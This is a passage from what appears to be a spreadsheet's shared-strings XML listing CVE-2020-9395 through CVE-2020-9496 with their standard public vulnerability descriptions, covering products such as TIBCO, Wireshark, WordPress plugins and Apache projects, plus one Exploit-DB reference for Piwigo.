    <t>An issue was discovered in the pricing-table-by-supsystic plugin before 1.8.2 for WordPress. It allows CSRF.</t>
  </si>
  <si>
    <t>CVE-2020-9395</t>
  </si>
  <si>
    <t>An issue was discovered on Realtek RTL8195AM, RTL8711AM, RTL8711AF, and RTL8710AF devices before 2.0.6. A stack-based buffer overflow exists in the client code that takes care of WPA2's 4-way-handshake via a malformed EAPOL-Key packet with a long keydata buffer.</t>
  </si>
  <si>
    <t>CVE-2020-9398</t>
  </si>
  <si>
    <t>ISPConfig before 3.1.15p3, when the undocumented reverse_proxy_panel_allowed=sites option is manually enabled, allows SQL Injection.</t>
  </si>
  <si>
    <t>CVE-2020-9399</t>
  </si>
  <si>
    <t>The Avast AV parsing engine allows virus-detection bypass via a crafted ZIP archive. This affects versions before 12 definitions 200114-0 of Antivirus Pro, Antivirus Pro Plus, and Antivirus for Linux.</t>
  </si>
  <si>
    <t>CVE-2020-9402</t>
  </si>
  <si>
    <t>Django 1.11 before 1.11.29, 2.2 before 2.2.11, and 3.0 before 3.0.4 allows SQL Injection if untrusted data is used as a tolerance parameter in GIS functions and aggregates on Oracle. By passing a suitably crafted tolerance to GIS functions and aggregates on Oracle, it was possible to break escaping and inject malicious SQL.</t>
  </si>
  <si>
    <t>CVE-2020-9403</t>
  </si>
  <si>
    <t>In PACTware before 4.1 SP6 and 5.x before 5.0.5.31, passwords are stored in a recoverable format, and may be retrieved by any user with access to the PACTware workstation.</t>
  </si>
  <si>
    <t>CVE-2020-9404</t>
  </si>
  <si>
    <t>In PACTware before 4.1 SP6 and 5.x before 5.0.5.31, passwords are stored in an insecure manner, and may be modified by an attacker with no knowledge of the current passwords.</t>
  </si>
  <si>
    <t>CVE-2020-9405</t>
  </si>
  <si>
    <t>IBL Online Weather before 4.3.5a allows unauthenticated reflected XSS via the redirect page.</t>
  </si>
  <si>
    <t>CVE-2020-9406</t>
  </si>
  <si>
    <t>IBL Online Weather before 4.3.5a allows unauthenticated eval injection via the queryBCP method of the Auxiliary Service.</t>
  </si>
  <si>
    <t>CVE-2020-9407</t>
  </si>
  <si>
    <t>IBL Online Weather before 4.3.5a allows attackers to obtain sensitive information by reading the IWEBSERVICE_JSONRPC_COOKIE cookie.</t>
  </si>
  <si>
    <t>CVE-2020-9408</t>
  </si>
  <si>
    <t>The Spotfire library component of TIBCO Software Inc.'s TIBCO Spotfire Analytics Platform for AWS Marketplace and TIBCO Spotfire Server contains a vulnerability that theoretically allows an attacker with write permissions to the Spotfire Library, but not "Script Author" group permission, to modify attributes of files and objects saved to the library such that the system treats them as trusted. This could allow an attacker to cause the Spotfire Web Player, Analyst clients, and TERR Service into executing arbitrary code with the privileges of the system account that started those processes. Affected releases are TIBCO Software Inc.'s TIBCO Spotfire Analytics Platform for AWS Marketplace: versions 10.8.0 and below and TIBCO Spotfire Server: versions 7.11.9 and below, versions 7.12.0, 7.13.0, 7.14.0, 10.0.0, 10.0.1, 10.1.0, 10.2.0, 10.3.0, 10.3.1, 10.3.2, 10.3.3, 10.3.4, 10.3.5, and 10.3.6, versions 10.4.0, 10.5.0, 10.6.0, 10.6.1, 10.7.0, and 10.8.0.</t>
  </si>
  <si>
    <t>CVE-2020-9409</t>
  </si>
  <si>
    <t>The administrative UI component of TIBCO Software Inc.'s TIBCO JasperReports Server, TIBCO JasperReports Server for AWS Marketplace, and TIBCO JasperReports Server for ActiveMatrix BPM contains a vulnerability that theoretically allows an unauthenticated attacker to obtain the permissions of a JasperReports Server "superuser" for the affected systems. The attacker can theoretically exploit the vulnerability consistently, remotely, and without authenticating. Affected releases are TIBCO Software Inc.'s TIBCO JasperReports Server: versions 7.1.1 and below, TIBCO JasperReports Server for AWS Marketplace: versions 7.1.1 and below, and TIBCO JasperReports Server for ActiveMatrix BPM: versions 7.1.1 and below.</t>
  </si>
  <si>
    <t>CVE-2020-9410</t>
  </si>
  <si>
    <t>The report generator component of TIBCO Software Inc.'s TIBCO JasperReports Library, TIBCO JasperReports Library for ActiveMatrix BPM, TIBCO JasperReports Server, TIBCO JasperReports Server for AWS Marketplace, and TIBCO JasperReports Server for ActiveMatrix BPM contains a vulnerability that theoretically allows an attacker to exploit HTML injection to gain full control of a web interface containing the output of the report generator component with the privileges of any user that views the affected report(s). The attacker can theoretically exploit this vulnerability when other users view a maliciously generated report, where those reports use Fusion Charts and a data source with contents controlled by the attacker. Affected releases are TIBCO Software Inc.'s TIBCO JasperReports Library: versions 7.1.1 and below, versions 7.2.0 and 7.2.1, version 7.3.0, version 7.5.0, TIBCO JasperReports Library for ActiveMatrix BPM: versions 7.1.1 and below, TIBCO JasperReports Server: versions 7.1.1 and below, version 7.2.0, version 7.5.0, TIBCO JasperReports Server for AWS Marketplace: versions 7.5.0 and below, and TIBCO JasperReports Server for ActiveMatrix BPM: versions 7.1.1 and below.</t>
  </si>
  <si>
    <t>CVE-2020-9411</t>
  </si>
  <si>
    <t>The file transfer component of TIBCO Software Inc.'s TIBCO Managed File Transfer Platform Server for IBM i contains a vulnerability that theoretically allows an attacker to perform unauthorized network file transfers to and from the file system accessible to the affected component. This vulnerability is exploitable when the configuration option 'Require Node Resp' is set to 'No'. In the event of a successful exploit, the attacker could theoretically read and write any file on the file system accessible to the affected component, thus fully affecting the confidentiality, integrity, and availability of the operating system hosting the deployment of the affected system. Affected releases are TIBCO Software Inc.'s TIBCO Managed File Transfer Platform Server for IBM i: versions 7.1.0 and below, version 8.0.0.</t>
  </si>
  <si>
    <t>CVE-2020-9412</t>
  </si>
  <si>
    <t>The file transfer component of TIBCO Software Inc.'s TIBCO Managed File Transfer Platform Server for IBM i contains a vulnerability that theoretically allows execution of arbitrary commands at the privilege level of the affected system following a failed file transfer. Affected releases are TIBCO Software Inc.'s TIBCO Managed File Transfer Platform Server for IBM i: versions 7.1.0 and below, version 8.0.0.</t>
  </si>
  <si>
    <t>CVE-2020-9413</t>
  </si>
  <si>
    <t>The MFT Browser file transfer client and MFT Browser admin client components of TIBCO Software Inc.'s TIBCO Managed File Transfer Command Center and TIBCO Managed File Transfer Internet Server contain a vulnerability that theoretically allows an attacker to craft an URL that will execute arbitrary commands on the affected system. If the attacker convinces an authenticated user with a currently active session to enter or click on the URL the commands will be executed on the affected system. Affected releases are TIBCO Software Inc.'s TIBCO Managed File Transfer Command Center: versions 8.2.1 and below and TIBCO Managed File Transfer Internet Server: versions 8.2.1 and below.</t>
  </si>
  <si>
    <t>CVE-2020-9414</t>
  </si>
  <si>
    <t>The MFT admin service component of TIBCO Software Inc.'s TIBCO Managed File Transfer Command Center and TIBCO Managed File Transfer Internet Server contains a vulnerability that theoretically allows an authenticated user with specific permissions to obtain the session identifier of another user. The session identifier when replayed could provide administrative rights or file transfer permissions to the affected system. Affected releases are TIBCO Software Inc.'s TIBCO Managed File Transfer Command Center: versions 8.2.1 and below and TIBCO Managed File Transfer Internet Server: versions 8.2.1 and below.</t>
  </si>
  <si>
    <t>CVE-2020-9415</t>
  </si>
  <si>
    <t>The TIBCO Data Virtualization Server component of TIBCO Software Inc.'s TIBCO Data Virtualization and TIBCO Data Virtualization for AWS Marketplace contains a vulnerability that theoretically allows a malicious authenticated user to download any arbitrary file from the affected system. The user must be authenticated and have privileges required to monitor the server in an operational capacity. Affected releases are TIBCO Software Inc.'s TIBCO Data Virtualization: versions 7.0.8 and below, versions 8.0.0, 8.1.0, 8.1.1, and 8.2.0 and TIBCO Data Virtualization for AWS Marketplace: versions 8.2.0 and below.</t>
  </si>
  <si>
    <t>CVE-2020-9416</t>
  </si>
  <si>
    <t>The Spotfire client component of TIBCO Software Inc.'s TIBCO Spotfire Analyst, TIBCO Spotfire Analytics Platform for AWS Marketplace, TIBCO Spotfire Desktop, and TIBCO Spotfire Server contains a vulnerability that theoretically allows a legitimate user to inject scripts. If executed by a victim authenticated to the affected system these scripts will be executed at the privileges of the victim. Affected releases are TIBCO Software Inc.'s TIBCO Spotfire Analyst: versions 10.7.0, 10.8.0, 10.9.0, and 10.10.0, TIBCO Spotfire Analytics Platform for AWS Marketplace: versions 10.7.0, 10.8.0, 10.8.1, 10.9.0, 10.10.0, and 10.10.1, TIBCO Spotfire Desktop: versions 10.7.0, 10.8.0, 10.9.0, and 10.10.0, and TIBCO Spotfire Server: versions 10.7.0, 10.8.0, 10.8.1, 10.9.0, 10.10.0, and 10.10.1.</t>
  </si>
  <si>
    <t>CVE-2020-9417</t>
  </si>
  <si>
    <t>The Transaction Insight reporting component of TIBCO Software Inc.'s TIBCO Foresight Archive and Retrieval System, TIBCO Foresight Archive and Retrieval System Healthcare Edition, TIBCO Foresight Operational Monitor, TIBCO Foresight Operational Monitor Healthcare Edition, TIBCO Foresight Transaction Insight, and TIBCO Foresight Transaction Insight Healthcare Edition contains a vulnerability that theoretically allows an authenticated attacker to perform SQL injection. Affected releases are TIBCO Software Inc.'s TIBCO Foresight Archive and Retrieval System: versions 5.1.0 and below, version 5.2.0, TIBCO Foresight Archive and Retrieval System Healthcare Edition: versions 5.1.0 and below, version 5.2.0, TIBCO Foresight Operational Monitor: versions 5.1.0 and below, version 5.2.0, TIBCO Foresight Operational Monitor Healthcare Edition: versions 5.1.0 and below, version 5.2.0, TIBCO Foresight Transaction Insight: versions 5.1.0 and below, version 5.2.0, and TIBCO Foresight Transaction Insight Healthcare Edition: versions 5.1.0 and below, version 5.2.0.</t>
  </si>
  <si>
    <t>CVE-2020-9418</t>
  </si>
  <si>
    <t>An untrusted search path vulnerability in the installer of PDFescape Desktop version 4.0.22 and earlier allows an attacker to gain privileges and execute code via DLL hijacking.</t>
  </si>
  <si>
    <t>CVE-2020-9423</t>
  </si>
  <si>
    <t>LogicalDoc before 8.3.3 could allow an attacker to upload arbitrary files, leading to command execution or retrieval of data from the database. LogicalDoc provides a functionality to add documents. Those documents could then be used for multiple tasks, such as version control, shared among users, applying tags, etc. This functionality could be abused by an unauthenticated attacker to upload an arbitrary file in a restricted folder. This would lead to the executions of malicious commands with root privileges.</t>
  </si>
  <si>
    <t>CVE-2020-9425</t>
  </si>
  <si>
    <t>An issue was discovered in includes/head.inc.php in rConfig before 3.9.4. An unauthenticated attacker can retrieve saved cleartext credentials via a GET request to settings.php. Because the application was not exiting after a redirect is applied, the rest of the page still executed, resulting in the disclosure of cleartext credentials in the response.</t>
  </si>
  <si>
    <t>CVE-2020-9426</t>
  </si>
  <si>
    <t>OX Guard 2.10.3 and earlier allows XSS.</t>
  </si>
  <si>
    <t>CVE-2020-9427</t>
  </si>
  <si>
    <t>OX Guard 2.10.3 and earlier allows SSRF.</t>
  </si>
  <si>
    <t>CVE-2020-9428</t>
  </si>
  <si>
    <t>In Wireshark 3.2.0 to 3.2.1, 3.0.0 to 3.0.8, and 2.6.0 to 2.6.14, the EAP dissector could crash. This was addressed in epan/dissectors/packet-eap.c by using more careful sscanf parsing.</t>
  </si>
  <si>
    <t>CVE-2020-9429</t>
  </si>
  <si>
    <t>In Wireshark 3.2.0 to 3.2.1, the WireGuard dissector could crash. This was addressed in epan/dissectors/packet-wireguard.c by handling the situation where a certain data structure intentionally has a NULL value.</t>
  </si>
  <si>
    <t>CVE-2020-9430</t>
  </si>
  <si>
    <t>In Wireshark 3.2.0 to 3.2.1, 3.0.0 to 3.0.8, and 2.6.0 to 2.6.14, the WiMax DLMAP dissector could crash. This was addressed in plugins/epan/wimax/msg_dlmap.c by validating a length field.</t>
  </si>
  <si>
    <t>CVE-2020-9431</t>
  </si>
  <si>
    <t>In Wireshark 3.2.0 to 3.2.1, 3.0.0 to 3.0.8, and 2.6.0 to 2.6.14, the LTE RRC dissector could leak memory. This was addressed in epan/dissectors/packet-lte-rrc.c by adjusting certain append operations.</t>
  </si>
  <si>
    <t>CVE-2020-9432</t>
  </si>
  <si>
    <t>openssl_x509_check_host in lua-openssl 0.7.7-1 mishandles X.509 certificate validation because it uses lua_pushboolean for certain non-boolean return values.</t>
  </si>
  <si>
    <t>CVE-2020-9433</t>
  </si>
  <si>
    <t>openssl_x509_check_email in lua-openssl 0.7.7-1 mishandles X.509 certificate validation because it uses lua_pushboolean for certain non-boolean return values.</t>
  </si>
  <si>
    <t>CVE-2020-9434</t>
  </si>
  <si>
    <t>openssl_x509_check_ip_asc in lua-openssl 0.7.7-1 mishandles X.509 certificate validation because it uses lua_pushboolean for certain non-boolean return values.</t>
  </si>
  <si>
    <t>CVE-2020-9435</t>
  </si>
  <si>
    <t>PHOENIX CONTACT TC ROUTER 3002T-4G through 2.05.3, TC ROUTER 2002T-3G through 2.05.3, TC ROUTER 3002T-4G VZW through 2.05.3, TC ROUTER 3002T-4G ATT through 2.05.3, TC CLOUD CLIENT 1002-4G through 2.03.17, and TC CLOUD CLIENT 1002-TXTX through 1.03.17 devices contain a hardcoded certificate (and key) that is used by default for web-based services on the device. Impersonation, man-in-the-middle, or passive decryption attacks are possible if the generic certificate is not replaced by a device-specific certificate during installation.</t>
  </si>
  <si>
    <t>CVE-2020-9436</t>
  </si>
  <si>
    <t>PHOENIX CONTACT TC ROUTER 3002T-4G through 2.05.3, TC ROUTER 2002T-3G through 2.05.3, TC ROUTER 3002T-4G VZW through 2.05.3, TC ROUTER 3002T-4G ATT through 2.05.3, TC CLOUD CLIENT 1002-4G through 2.03.17, and TC CLOUD CLIENT 1002-TXTX through 1.03.17 devices allow authenticated users to inject system commands through a modified POST request to a specific URL.</t>
  </si>
  <si>
    <t>CVE-2020-9437</t>
  </si>
  <si>
    <t>SecureAuth.aspx in SecureAuth IdP 9.3.0 suffers from a client-side template injection that allows for script execution, in the same manner as XSS.</t>
  </si>
  <si>
    <t>CVE-2020-9438</t>
  </si>
  <si>
    <t>Tinxy Door Lock with firmware before 3.2 allow attackers to unlock a door by replaying an Unlock request that occurred when the attacker was previously authorized. In other words, door-access revocation is mishandled.</t>
  </si>
  <si>
    <t>CVE-2020-9439</t>
  </si>
  <si>
    <t>Multiple cross-site scripting (XSS) vulnerabilities in Uncanny Owl Tin Canny LearnDash Reporting before 3.4.4 allows authenticated remote attackers to inject arbitrary web script or HTML via the search_key GET Parameter in TinCan_Content_List_Table.php, message GET Parameter in licensing.php, tc_filter_group parameter in reporting-admin-menu.php, tc_filter_user parameter in reporting-admin-menu.php, tc_filter_course parameter in reporting-admin-menu.php, tc_filter_lesson parameter in reporting-admin-menu.php, tc_filter_module parameter in reporting-admin-menu.php, tc_filter_action parameter in reporting-admin-menu.php, tc_filter_data_range parameter in reporting-admin-menu.php, or tc_filter_data_range_last parameter in reporting-admin-menu.php.</t>
  </si>
  <si>
    <t>CVE-2020-9440</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability in the WSC plugin through 5.5.7.5 for CKEditor 4 allows remote attackers to run arbitrary web script inside an IFRAME element by injecting a crafted HTML element into the editor.</t>
  </si>
  <si>
    <t>CVE-2020-9442</t>
  </si>
  <si>
    <t>OpenVPN Connect 3.1.0.361 on Windows has Insecure Permissions for %PROGRAMDATA%\OpenVPN Connect\drivers\tap\amd64\win10, which allows local users to gain privileges by copying a malicious drvstore.dll there.</t>
  </si>
  <si>
    <t>CVE-2020-9443</t>
  </si>
  <si>
    <t>Zulip Desktop before 4.0.3 loaded untrusted content in an Electron webview with web security disabled, which can be exploited for XSS in a number of ways. This especially affects Zulip Desktop 2.3.82.</t>
  </si>
  <si>
    <t>CVE-2020-9444</t>
  </si>
  <si>
    <t>Zulip Server before 2.1.3 allows reverse tabnabbing via the Markdown functionality.</t>
  </si>
  <si>
    <t>CVE-2020-9445</t>
  </si>
  <si>
    <t>Zulip Server before 2.1.3 allows XSS via the modal_link feature in the Markdown functionality.</t>
  </si>
  <si>
    <t>CVE-2020-9447</t>
  </si>
  <si>
    <t>There is an XSS (cross-site scripting) vulnerability in GwtUpload 1.0.3 in the file upload functionality. Someone can upload a file with a malicious filename, which contains JavaScript code, which would result in XSS. Cross-site scripting enables attackers to steal data, change the appearance of a website, and perform other malicious activities like phishing or drive-by hacking.</t>
  </si>
  <si>
    <t>CVE-2020-9449</t>
  </si>
  <si>
    <t>An insecure random number generation vulnerability in BlaB! AX, BlaB! AX Pro, BlaB! WS (client), and BlaB! WS Pro (client) version 19.11 allows an attacker (with a guest or user session cookie) to escalate privileges by retrieving the cookie salt value and creating a valid session cookie for an arbitrary user or admin.</t>
  </si>
  <si>
    <t>CVE-2020-9450</t>
  </si>
  <si>
    <t>An issue was discovered in Acronis True Image 2020 24.5.22510. anti_ransomware_service.exe exposes a REST API that can be used by everyone, even unprivileged users. This API is used to communicate from the GUI to anti_ransomware_service.exe. This can be exploited to add an arbitrary malicious executable to the whitelist, or even exclude an entire drive from being monitored by anti_ransomware_service.exe.</t>
  </si>
  <si>
    <t>CVE-2020-9451</t>
  </si>
  <si>
    <t>An issue was discovered in Acronis True Image 2020 24.5.22510. anti_ransomware_service.exe keeps a log in a folder where unprivileged users have write permissions. The logs are generated in a predictable pattern, allowing an unprivileged user to create a hardlink from a (not yet created) log file to anti_ransomware_service.exe. On reboot, this forces the anti_ransomware_service to try to write its log into its own process, crashing in a SHARING VIOLATION. This crash occurs on every reboot.</t>
  </si>
  <si>
    <t>CVE-2020-9452</t>
  </si>
  <si>
    <t>An issue was discovered in Acronis True Image 2020 24.5.22510. anti_ransomware_service.exe includes functionality to quarantine files by copying a suspected ransomware file from one directory to another using SYSTEM privileges. Because unprivileged users have write permissions in the quarantine folder, it is possible to control this privileged write with a hardlink. This means that an unprivileged user can write/overwrite arbitrary files in arbitrary folders. Escalating privileges to SYSTEM is trivial with arbitrary writes. While the quarantine feature is not enabled by default, it can be forced to copy the file to the quarantine by communicating with anti_ransomware_service.exe through its REST API.</t>
  </si>
  <si>
    <t>CVE-2020-9453</t>
  </si>
  <si>
    <t>In Epson iProjection v2.30, the driver file EMP_MPAU.sys allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of not validating input values from IOCtl 0x9C402406 and IOCtl 0x9C40240A. (0x9C402402 has only a NULL pointer dereference.) This affects \Device\EMPMPAUIO and \DosDevices\EMPMPAU.</t>
  </si>
  <si>
    <t>CVE-2020-9454</t>
  </si>
  <si>
    <t>A CSRF vulnerability in the RegistrationMagic plugin through 4.6.0.3 for WordPress allows remote attackers to forge requests on behalf of a site administrator to change all settings for the plugin, including deleting users, creating new roles with escalated privileges, and allowing PHP file uploads via forms.</t>
  </si>
  <si>
    <t>CVE-2020-9455</t>
  </si>
  <si>
    <t>The RegistrationMagic plugin through 4.6.0.3 for WordPress allows remote authenticated users (with minimal privileges) to send arbitrary emails on behalf of the site via class_rm_user_services.php send_email_user_view.</t>
  </si>
  <si>
    <t>CVE-2020-9456</t>
  </si>
  <si>
    <t>In the RegistrationMagic plugin through 4.6.0.3 for WordPress, the user controller allows remote authenticated users (with minimal privileges) to elevate their privileges to administrator via class_rm_user_controller.php rm_user_edit.</t>
  </si>
  <si>
    <t>CVE-2020-9457</t>
  </si>
  <si>
    <t>The RegistrationMagic plugin through 4.6.0.3 for WordPress allows remote authenticated users (with minimal privileges) to import custom vulnerable forms and change form settings via class_rm_form_settings_controller.php, resulting in privilege escalation.</t>
  </si>
  <si>
    <t>CVE-2020-9458</t>
  </si>
  <si>
    <t>In the RegistrationMagic plugin through 4.6.0.3 for WordPress, the export function allows remote authenticated users (with minimal privileges) to export submitted form data and settings via class_rm_form_controller.php rm_form_export.</t>
  </si>
  <si>
    <t>CVE-2020-9459</t>
  </si>
  <si>
    <t>Multiple Stored Cross-site scripting (XSS) vulnerabilities in the Webnus Modern Events Calendar Lite plugin through 5.1.6 for WordPress allows remote authenticated users (with minimal permissions) to inject arbitrary JavaScript, HTML, or CSS via Ajax actions. This affects mec_save_notifications and import_settings.</t>
  </si>
  <si>
    <t>CVE-2020-9460</t>
  </si>
  <si>
    <t>Octech Oempro 4.7 through 4.11 allow XSS by an authenticated user. The parameter CampaignName in Campaign.Create is vulnerable.</t>
  </si>
  <si>
    <t>CVE-2020-9461</t>
  </si>
  <si>
    <t>Octech Oempro 4.7 through 4.11 allow stored XSS by an authenticated user. The FolderName parameter of the Media.CreateFolder command is vulnerable.</t>
  </si>
  <si>
    <t>CVE-2020-9462</t>
  </si>
  <si>
    <t>An issue was discovered in all Athom Homey and Homey Pro devices up to the current version 4.2.0. An attacker within RF range can obtain a cleartext copy of the network configuration of the device, including the Wi-Fi PSK, during device setup. Upon success, the attacker is able to further infiltrate the target's Wi-Fi networks.</t>
  </si>
  <si>
    <t>CVE-2020-9463</t>
  </si>
  <si>
    <t>Centreon 19.10 allows remote authenticated users to execute arbitrary OS commands via shell metacharacters in the server_ip field in JSON data in an api/internal.php?object=centreon_configuration_remote request.</t>
  </si>
  <si>
    <t>CVE-2020-9464</t>
  </si>
  <si>
    <t>A Denial-of-Service vulnerability exists in BECKHOFF Ethernet TCP/IP Bus Coupler BK9000. After an attack has occurred, the device's functionality can be restored by rebooting.</t>
  </si>
  <si>
    <t>CVE-2020-9465</t>
  </si>
  <si>
    <t>An issue was discovered in EyesOfNetwork eonweb 5.1 through 5.3 before 5.3-3. The eonweb web interface is prone to a SQL injection, allowing an unauthenticated attacker to perform various tasks such as authentication bypass via the user_id field in a cookie.</t>
  </si>
  <si>
    <t>CVE-2020-9466</t>
  </si>
  <si>
    <t>The Export Users to CSV plugin through 1.4.2 for WordPress allows CSV Injection.</t>
  </si>
  <si>
    <t>CVE-2020-9467</t>
  </si>
  <si>
    <t>Piwigo 2.10.1 has stored XSS via the file parameter in a /ws.php request because of the pwg.images.setInfo function.</t>
  </si>
  <si>
    <t>exploits/php/webapps/48814.txt</t>
  </si>
  <si>
    <t>Piwigo 2.10.1 - Cross Site Scripting</t>
  </si>
  <si>
    <t>2020-09-16</t>
  </si>
  <si>
    <t>CVE-2020-9468</t>
  </si>
  <si>
    <t>The Community plugin 2.9.e-beta for Piwigo allows users to set image information on images in albums for which they do not have permission, by manipulating the image_id parameter.</t>
  </si>
  <si>
    <t>CVE-2020-9470</t>
  </si>
  <si>
    <t>An issue was discovered in Wing FTP Server 6.2.5 before February 2020. Due to insecure permissions when handling session cookies, a local user may view the contents of the session and session_admin directories, which expose active session cookies within the Wing FTP HTTP interface and administration panel. These cookies may be used to hijack user and administrative sessions, including the ability to execute Lua commands as root within the administration panel.</t>
  </si>
  <si>
    <t>CVE-2020-9471</t>
  </si>
  <si>
    <t>Umbraco Cloud 8.5.3 allows an authenticated file upload (and consequently Remote Code Execution) via the Install Packages functionality.</t>
  </si>
  <si>
    <t>CVE-2020-9472</t>
  </si>
  <si>
    <t>Umbraco CMS 8.5.3 allows an authenticated file upload (and consequently Remote Code Execution) via the Install Package functionality.</t>
  </si>
  <si>
    <t>CVE-2020-9473</t>
  </si>
  <si>
    <t>The S. Siedle &amp; Soehne SG 150-0 Smart Gateway before 1.2.4 has a passwordless ftp ssh user. By using an exploit chain, an attacker with access to the network can get root access on the gateway.</t>
  </si>
  <si>
    <t>CVE-2020-9474</t>
  </si>
  <si>
    <t>The S. Siedle &amp; Soehne SG 150-0 Smart Gateway before 1.2.4 allows remote code execution via the backup functionality in the web frontend. By using an exploit chain, an attacker with access to the network can get root access on the gateway.</t>
  </si>
  <si>
    <t>CVE-2020-9475</t>
  </si>
  <si>
    <t>The S. Siedle &amp; Soehne SG 150-0 Smart Gateway before 1.2.4 allows local privilege escalation via a race condition in logrotate. By using an exploit chain, an attacker with access to the network can get root access on the gateway.</t>
  </si>
  <si>
    <t>CVE-2020-9476</t>
  </si>
  <si>
    <t>ARRIS TG1692A devices allow remote attackers to discover the administrator login name and password by reading the /login page and performing base64 decoding.</t>
  </si>
  <si>
    <t>CVE-2020-9477</t>
  </si>
  <si>
    <t>An issue was discovered on HUMAX HGA12R-02 BRGCAA 1.1.53 devices. A vulnerability in the authentication functionality in the web-based interface could allow an unauthenticated remote attacker to capture packets at the time of authentication and gain access to the cleartext password. An attacker could use this access to create a new user account or control the device.</t>
  </si>
  <si>
    <t>CVE-2020-9478</t>
  </si>
  <si>
    <t>An issue was discovered in Rubrik 5.0.3-2296. An OS command injection vulnerability allows an authenticated attacker to remotely execute arbitrary code on Rubrik-managed systems.</t>
  </si>
  <si>
    <t>CVE-2020-9480</t>
  </si>
  <si>
    <t>In Apache Spark 2.4.5 and earlier, a standalone resource manager's master may be configured to require authentication (spark.authenticate) via a shared secret. When enabled, however, a specially-crafted RPC to the master can succeed in starting an application's resources on the Spark cluster, even without the shared key. This can be leveraged to execute shell commands on the host machine. This does not affect Spark clusters using other resource managers (YARN, Mesos, etc).</t>
  </si>
  <si>
    <t>CVE-2020-9481</t>
  </si>
  <si>
    <t>Apache ATS 6.0.0 to 6.2.3, 7.0.0 to 7.1.9, and 8.0.0 to 8.0.6 is vulnerable to a HTTP/2 slow read attack.</t>
  </si>
  <si>
    <t>CVE-2020-9482</t>
  </si>
  <si>
    <t>If NiFi Registry 0.1.0 to 0.5.0 uses an authentication mechanism other than PKI, when the user clicks Log Out, NiFi Registry invalidates the authentication token on the client side but not on the server side. This permits the user's client-side token to be used for up to 12 hours after logging out to make API requests to NiFi Registry.</t>
  </si>
  <si>
    <t>CVE-2020-9483</t>
  </si>
  <si>
    <t>**Resolved** When use H2/MySQL/TiDB as Apache SkyWalking storage, the metadata query through GraphQL protocol, there is a SQL injection vulnerability, which allows to access unpexcted data. Apache SkyWalking 6.0.0 to 6.6.0, 7.0.0 H2/MySQL/TiDB storage implementations don't use the appropriate way to set SQL parameters.</t>
  </si>
  <si>
    <t>CVE-2020-9484</t>
  </si>
  <si>
    <t>When using Apache Tomcat versions 10.0.0-M1 to 10.0.0-M4, 9.0.0.M1 to 9.0.34, 8.5.0 to 8.5.54 and 7.0.0 to 7.0.103 if a) an attacker is able to control the contents and name of a file on the server; and b) the server is configured to use the PersistenceManager with a FileStore; and c) the PersistenceManager is configured with sessionAttributeValueClassNameFilter="null" (the default unless a SecurityManager is used) or a sufficiently lax filter to allow the attacker provided object to be deserialized; and d) the attacker knows the relative file path from the storage location used by FileStore to the file the attacker has control over; then, using a specifically crafted request, the attacker will be able to trigger remote code execution via deserialization of the file under their control. Note that all of conditions a) to d) must be true for the attack to succeed.</t>
  </si>
  <si>
    <t>CVE-2020-9485</t>
  </si>
  <si>
    <t>An issue was found in Apache Airflow versions 1.10.10 and below. A stored XSS vulnerability was discovered in the Chart pages of the the "classic" UI.</t>
  </si>
  <si>
    <t>CVE-2020-9486</t>
  </si>
  <si>
    <t>In Apache NiFi 1.10.0 to 1.11.4, the NiFi stateless execution engine produced log output which included sensitive property values. When a flow was triggered, the flow definition configuration JSON was printed, potentially containing sensitive values in plaintext.</t>
  </si>
  <si>
    <t>CVE-2020-9487</t>
  </si>
  <si>
    <t>In Apache NiFi 1.0.0 to 1.11.4, the NiFi download token (one-time password) mechanism used a fixed cache size and did not authenticate a request to create a download token, only when attempting to use the token to access the content. An unauthenticated user could repeatedly request download tokens, preventing legitimate users from requesting download tokens.</t>
  </si>
  <si>
    <t>CVE-2020-9488</t>
  </si>
  <si>
    <t>Improper validation of certificate with host mismatch in Apache Log4j SMTP appender. This could allow an SMTPS connection to be intercepted by a man-in-the-middle attack which could leak any log messages sent through that appender. Fixed in Apache Log4j 2.12.3 and 2.13.1</t>
  </si>
  <si>
    <t>CVE-2020-9489</t>
  </si>
  <si>
    <t>A carefully crafted or corrupt file may trigger a System.exit in Tika's OneNote Parser. Crafted or corrupted files can also cause out of memory errors and/or infinite loops in Tika's ICNSParser, MP3Parser, MP4Parser, SAS7BDATParser, OneNoteParser and ImageParser. Apache Tika users should upgrade to 1.24.1 or later. The vulnerabilities in the MP4Parser were partially fixed by upgrading the com.googlecode:isoparser:1.1.22 dependency to org.tallison:isoparser:1.9.41.2. For unrelated security reasons, we upgraded org.apache.cxf to 3.3.6 as part of the 1.24.1 release.</t>
  </si>
  <si>
    <t>CVE-2020-9490</t>
  </si>
  <si>
    <t>Apache HTTP Server versions 2.4.20 to 2.4.43. A specially crafted value for the 'Cache-Digest' header in a HTTP/2 request would result in a crash when the server actually tries to HTTP/2 PUSH a resource afterwards. Configuring the HTTP/2 feature via "H2Push off" will mitigate this vulnerability for unpatched servers.</t>
  </si>
  <si>
    <t>CVE-2020-9491</t>
  </si>
  <si>
    <t>In Apache NiFi 1.2.0 to 1.11.4, the NiFi UI and API were protected by mandating TLS v1.2, as well as listening connections established by processors like ListenHTTP, HandleHttpRequest, etc. However intracluster communication such as cluster request replication, Site-to-Site, and load balanced queues continued to support TLS v1.0 or v1.1.</t>
  </si>
  <si>
    <t>CVE-2020-9492</t>
  </si>
  <si>
    <t>In Apache Hadoop 3.2.0 to 3.2.1, 3.0.0-alpha1 to 3.1.3, and 2.0.0-alpha to 2.10.0, WebHDFS client might send SPNEGO authorization header to remote URL without proper verification.</t>
  </si>
  <si>
    <t>CVE-2020-9493</t>
  </si>
  <si>
    <t>A deserialization flaw was found in Apache Chainsaw versions prior to 2.1.0 which could lead to malicious code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9494</t>
  </si>
  <si>
    <t>Apache Traffic Server 6.0.0 to 6.2.3, 7.0.0 to 7.1.10, and 8.0.0 to 8.0.7 is vulnerable to certain types of HTTP/2 HEADERS frames that can cause the server to allocate a large amount of memory and spin the thread.</t>
  </si>
  <si>
    <t>CVE-2020-9495</t>
  </si>
  <si>
    <t>Apache Archiva login service before 2.2.5 is vulnerable to LDAP injection. A attacker is able to retrieve user attribute data from the connected LDAP server by providing special values to the login form. With certain characters it is possible to modify the LDAP filter used to query the LDAP users. By measuring the response time for the login request, arbitrary attribute data can be retrieved from LDAP user objects.</t>
  </si>
  <si>
    <t>CVE-2020-9496</t>
  </si>
  <si>
    <t>XML-RPC request are vulnerable to unsafe deserialization and Cross-Site Scripting issues in Apache OFBiz 17.12.03</t>
  </si>
  <si>
